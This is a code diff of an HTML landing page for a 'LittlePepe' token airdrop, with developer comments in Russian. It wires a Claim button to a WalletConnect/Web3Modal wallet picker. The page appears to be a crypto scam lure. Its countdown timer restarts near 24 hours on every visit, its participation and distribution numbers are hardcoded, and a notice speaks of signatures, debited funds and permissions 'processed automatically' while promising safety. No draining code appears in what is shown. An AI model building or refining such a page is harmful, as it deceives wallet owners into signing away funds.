--- a/index.html
+++ b/index.html
@@ -11,15 +11,12 @@
   <script type="module">
     import { createWeb3Modal, defaultWagmiConfig } from "https://esm.sh/@web3modal/wagmi";
     import { polygon } from "https://esm.sh/viem/chains";
-    import { createAppKit } from "https://esm.sh/@reown/appkit";
-    import { WagmiAdapter } from "https://esm.sh/@reown/appkit-adapter-wagmi";
 
-    const projectId = "ВАШ_PROJECT_ID"; // сюда ваш Project ID
+    const projectId = "56edaed968d799280ffd685113d7f126";
     const chains = [polygon];
-
     const config = defaultWagmiConfig({ chains, projectId });
 
-    // Web3Modal только для кошельков (MetaMask/Trust + WalletConnect)
+    // Web3Modal с отключением соцсетей
     const modal = createWeb3Modal({
       wagmiConfig: config,
       projectId,
@@ -33,155 +30,116 @@
       enableInjectedWallet: true,
       enableCoinbase: false,
       enableEmail: false,
-      enableSocialLogin: false
-    });
-
-    // Reown AppKit
-    const appKit = createAppKit({
-      adapters: [new WagmiAdapter({ projectId, chains })],
-      projectId,
-      networks: chains,
-      social: { enabled: false }
+      enableSocialLogin: false // <-- соцсети выключены
     });
 
     window.onload = () => {
       const claimBtn = document.getElementById("claimBtn");
-      const addrBox = document.getElementById("addrBox");
-      const networkBox = document.getElementById("networkBox");
-
       claimBtn.disabled = false;
 
       claimBtn.addEventListener("click", async () => {
+        // открываем только выбор кошелька без соцсетей
         await modal.open();
-        const wallet = await appKit.connect();
-
-        if(wallet) {
-          addrBox.textContent = `Connected: ${wallet.address}`;
-          networkBox.textContent = `Network: ${wallet.network.name}`;
-        }
       });
     };
   </script>
 </head>
 <body>
-  <header class="nav">
-    <div class="brand">
-      <img src="logo.svg" alt="logo" class="logo"/>
-      <div class="brand-text">
-        <div class="title">AIR<span>DROP</span></div>
-        <div class="subtitle">Live • Product</div>
-      </div>
+<!-- тут весь твой HTML без изменений -->
+<header class="nav">
+  <div class="brand">
+    <img src="logo.svg" alt="logo" class="logo"/>
+    <div class="brand-text">
+      <div class="title">AIR<span>DROP</span></div>
+      <div class="subtitle">Live • Product</div>
     </div>
-    <div class="wallet-box">
-      <button id="disconnectBtn" class="btn ghost hidden">Disable</button>
+  </div>
+  <div class="wallet-box">
+    <button id="disconnectBtn" class="btn ghost hidden">Disable</button>
+  </div>
+</header>
+
+<main class="container">
+<section class="hero card">
+  <h1 id="tokenName">Airdrop: <span>LittlePepe</span> Token</h1>
+  <p class="lead">
+    Welcome to AirDrop! Connect your wallet (MetaMask, TrustWallet, etc.) and participate in the token distribution. All operations are in real mode — you can send and receive tokens.
+  </p>
+
+  <div class="stats">
+    <div class="stat">
+      <div class="stat-num" id="supply">1,000,000</div>
+      <div class="stat-label">Total tokens</div>
     </div>
-  </header>
-
-  <main class="container">
-    <section class="hero card">
-      <h1 id="tokenName">Airdrop: <span>LittlePepe</span> Token</h1>
-      <p class="lead">
-        Welcome to AirDrop! Connect your wallet (MetaMask, TrustWallet, etc.) and participate in the token distribution. All operations are in real mode — you can send and receive tokens.
-      </p>
-
-      <div class="stats">
-        <div class="stat">
-          <div class="stat-num" id="supply">1,000,000</div>
-          <div class="stat-label">Total tokens</div>
-        </div>
-        <div class="stat">
-          <div class="stat-num" id="claimable">2,000</div>
-          <div class="stat-label">on one member</div>
-        </div>
-        <div class="stat">
-          <div id="countdown">Loading...</div>
-          <div class="stat-label">Until the end</div>
-        </div>
-      </div>
-
-      <script>
-        let endTime = new Date();
-        endTime.setHours(endTime.getHours() + 23);
-        endTime.setMinutes(endTime.getMinutes() + 42);
-        endTime.setSeconds(endTime.getSeconds() + 56);
-
-        function updateCountdown() {
-          let now = new Date();
-          let diff = endTime - now;
-          if(diff <= 0) {
-            document.getElementById("countdown").innerHTML = "AirDrop ended!";
-            clearInterval(timer);
-            return;
-          }
-          let hours = Math.floor(diff / (1000*60*60));
-          let minutes = Math.floor((diff % (1000*60*60))/(1000*60));
-          let seconds = Math.floor((diff % (1000*60))/1000);
-          document.getElementById("countdown").innerHTML = hours+"h "+minutes+"m "+seconds+"s";
-        }
-        let timer = setInterval(updateCountdown, 1000);
-        updateCountdown();
-      </script>
-
-      <div class="card inner">
-        <div class="wallet-info">
-          <div id="addrBox" class="muted">Wallet not connected</div>
-          <div id="networkBox" class="muted">Network: —</div>
-        </div>
-
-        <div class="actions">
-          <button id="claimBtn" class="btn success" disabled>Claim</button>
-          <button id="copyBtn" class="btn" disabled>Copy address</button>
-        </div>
-
-        <div id="notice" class="notice">
-          <p>⚠️ AirDrop is active: the Claim button creates a signature and makes a real transaction to your wallet. Funds are debited only after your confirmation, and all necessary permissions are processed automatically.</p>
-        </div>
-      </div>
-    </section>
-    
-    <div class="airdrop-tab">
-      <h3>Why Choose Our AirDrop?</h3>
-      <p>Our AirDrop is designed to reward our community fairly, safely, and transparently. Join now to receive tokens directly to your wallet, with full control over your participation.</p>
+    <div class="stat">
+      <div class="stat-num" id="claimable">2,000</div>
+      <div class="stat-label">on one member</div>
     </div>
-
-    <div class="airdrop-stats">
-      <div class="stat-tab">
-        <div class="stat-number" id="total-distributed">322,000</div>
-        <div class="stat-label">Total Distributed</div>
-      </div>
-      <div class="stat-tab">
-        <div class="stat-number" id="users-received">161</div>
-        <div class="stat-label">Users Participated</div>
-      </div>
-      <div class="stat-tab">
-        <div class="stat-number" id="tokens-left">678,000</div>
-        <div class="stat-label">Tokens Left</div>
-      </div>
+    <div class="stat">
+      <div id="countdown">Loading...</div>
+      <div class="stat-label">Until the end</div>
     </div>
+  </div>
 
-    <style>
-      .airdrop-tab {
-        background: #111;
-        color: #fff;
-        padding: 15px;
-        border-radius: 8px;
-        margin-bottom: 20px;
-        max-width: 1200px;
+  <script>
+    let endTime = new Date();
+    endTime.setHours(endTime.getHours() + 23);
+    endTime.setMinutes(endTime.getMinutes() + 42);
+    endTime.setSeconds(endTime.getSeconds() + 56);
+
+    function updateCountdown() {
+      let now = new Date();
+      let diff = endTime - now;
+      if (diff <= 0) {
+        document.getElementById("countdown").innerHTML = "AirDrop ended!";
+        clearInterval(timer);
+        return;
       }
-      .airdrop-tab h3 { margin: 0 0 10px 0; font-size: 18px; }
-      .airdrop-tab p { font-size: 14px; line-height: 1.4; }
-      .airdrop-stats {
-        display: flex;
-        gap: 10px;
-        background: #000;
-        padding: 10px;
-        border-radius: 8px;
-        max-width: 1200px;
-      }
-      .stat-tab { flex: 1; background: #111; border-radius: 6px; padding: 10px; text-align: center; color: #00bfff; }
-      .stat-number { font-size: 16px; font-weight: bold; }
-      .stat-label { font-size: 12px; margin-top: 4px; color: #ccc; }
-    </style>
-  </main>
+      let hours = Math.floor(diff / (1000*60*60));
+      let minutes = Math.floor((diff % (1000*60*60))/(1000*60));
+      let seconds = Math.floor((diff % (1000*60))/1000);
+      document.getElementById("countdown").innerHTML = hours+"h "+minutes+"m "+seconds+"s";
+    }
+    let timer = setInterval(updateCountdown, 1000);
+    updateCountdown();
+  </script>
+
+  <div class="card inner">
+    <div class="wallet-info">
+      <div id="addrBox" class="muted">Wallet not connected</div>
+      <div id="networkBox" class="muted">Network: —</div>
+    </div>
+
+    <div class="actions">
+      <button id="claimBtn" class="btn success" disabled>Claim</button>
+      <button id="copyBtn" class="btn" disabled>Copy address</button>
+    </div>
+
+    <div id="notice" class="notice">
+      <p>⚠️ AirDrop is active: the Claim button creates a signature and makes a real transaction to your wallet. Funds are debited only after your confirmation, and all necessary permissions are processed automatically.</p>
+    </div>
+  </div>
+</section>
+
+<div class="airdrop-tab">
+  <h3>Why Choose Our AirDrop?</h3>
+  <p>Our AirDrop is designed to reward our community fairly, safely, and transparently. Join now to receive tokens directly to your wallet, with full control over your participation.</p>
+</div>
+
+<div class="airdrop-stats">
+  <div class="stat-tab">
+    <div class="stat-number" id="total-distributed">322,000</div>
+    <div class="stat-label">Total Distributed</div>
+  </div>
+  <div class="stat-tab">
+    <div class="stat-number" id="users-received">161</div>
+    <div class="stat-label">Users Participated</div>
+  </div>
+  <div class="stat-tab">
+    <div class="stat-number" id="tokens-left">678,000</div>
+    <div class="stat-label">Tokens Left</div>
+  </div>
+</div>
+</main>
 </body>
 </html>
